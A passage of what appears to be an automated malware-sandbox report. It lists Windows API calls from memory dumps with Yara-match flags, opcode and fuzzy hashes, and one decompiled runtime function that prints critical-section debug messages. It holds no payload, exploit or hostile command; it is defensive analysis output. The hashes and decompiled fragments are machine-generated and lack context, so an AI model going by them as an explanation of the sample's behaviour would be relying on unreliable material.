                      • Opcode Fuzzy Hash: 5ae1f666e4370ccf60eb3c6adbeb4b46241ef6bb8157a8c6bc5332d8c03f5f28
                      • Instruction Fuzzy Hash: 2AE092733813043AE3306599AC42FA7B39DCB81B30F55002AFA0DEB2C0D995F40146A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02C6F050,?,?,00000000), ref: 02C791EC
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 0b2d1ffff7a055657344c6f914f8e96d2bcb012b7b5fe33713657e6096172b4a
                      • Instruction ID: e6a00e873eda1f59aee78d873490c5dd885ab22c24451fed4e30827bf8c497ec
                      • Opcode Fuzzy Hash: 0b2d1ffff7a055657344c6f914f8e96d2bcb012b7b5fe33713657e6096172b4a
                      • Instruction Fuzzy Hash: AFF06D7368031436E33066999C43F97B66D9B81B20F55002AFA1DAB2C0D9A9F9054BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C6F1D2,02C6F1D2,?,00000000,?,?), ref: 02C7A800
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction ID: 2591eece5dca955e4bb6a93ee1fab531b35e06da65566cfcf77d535d2537723e
                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction Fuzzy Hash: 0AE01AB12002086BDB10DF49CC84EEB37ADEF88650F118154FA0857241C931E8108BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,02C68D14,?), ref: 02C6F6FB
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 10e294ed911667f0320052aaf146dff8ccc6a9ea132985db60a4ff6a949be42a
                      • Instruction ID: 73629d5e07913bc72ff0a0c08b62e69272694ecf9d13a0692e9cd00f8113e496
                      • Opcode Fuzzy Hash: 10e294ed911667f0320052aaf146dff8ccc6a9ea132985db60a4ff6a949be42a
                      • Instruction Fuzzy Hash: 26E0C2353812057AF714EEB19C0AF263A965B81708F0A00A8F549DF2C3EA60D1018651
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,02C68D14,?), ref: 02C6F6FB
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction ID: 38f78ae49dc4867c732323e52200006282c90a17d9a788e26d73429f6d1774c0
                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction Fuzzy Hash: E4D05E616503082AE610AAA49C06F26728A5B44A14F490064F949962C3E950E1004565
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a771e672cb1abb73446bc8b7b25ae6bc31e1f6384c6b3aae359b6917668590a5
                      • Instruction ID: dc9b9cb375648bcd8a4b3fbdfaedb684cb6d56651e6d6404c80a33e66dfeda7f
                      • Opcode Fuzzy Hash: a771e672cb1abb73446bc8b7b25ae6bc31e1f6384c6b3aae359b6917668590a5
                      • Instruction Fuzzy Hash: 31B09B719414C5C5FA15EB604708737794877D5741F16C162D1020651A4778C4D1F5B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 53%
                      			E036DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                      				void* _t7;
                      				intOrPtr _t9;
                      				intOrPtr _t10;
                      				intOrPtr* _t12;
                      				intOrPtr* _t13;
                      				intOrPtr _t14;
                      				intOrPtr* _t15;
                      
                      				_t13 = __edx;
                      				_push(_a4);
                      				_t14 =  *[fs:0x18];
                      				_t15 = _t12;
                      				_t7 = E0368CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                      				_push(_t13);
                      				E036D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                      				_t9 =  *_t15;
                      				if(_t9 == 0xffffffff) {
                      					_t10 = 0;
                      				} else {
                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                      				}
                      				_push(_t10);
                      				_push(_t15);
                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                      				return E036D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                      			}











                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036DFDFA
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036DFE2B
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036DFE01
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 0c7d6900978d9ddd9992aca90c2056f77d1f6b08d8761b475d8a049ad6a841a8
                      • Instruction ID: cad5f33eb506f47c93c81bfb7618b1df99580c0ef988bca2aeba21d54ce70f63
                      • Opcode Fuzzy Hash: 0c7d6900978d9ddd9992aca90c2056f77d1f6b08d8761b475d8a049ad6a841a8
                      • Instruction Fuzzy Hash: 8EF0F676A00201BFD6309B45DC06F23BB6AEB45B30F244318F6285A5D1DA62F82086F4
                      Uniqueness

                      Uniqueness Score: -1.00%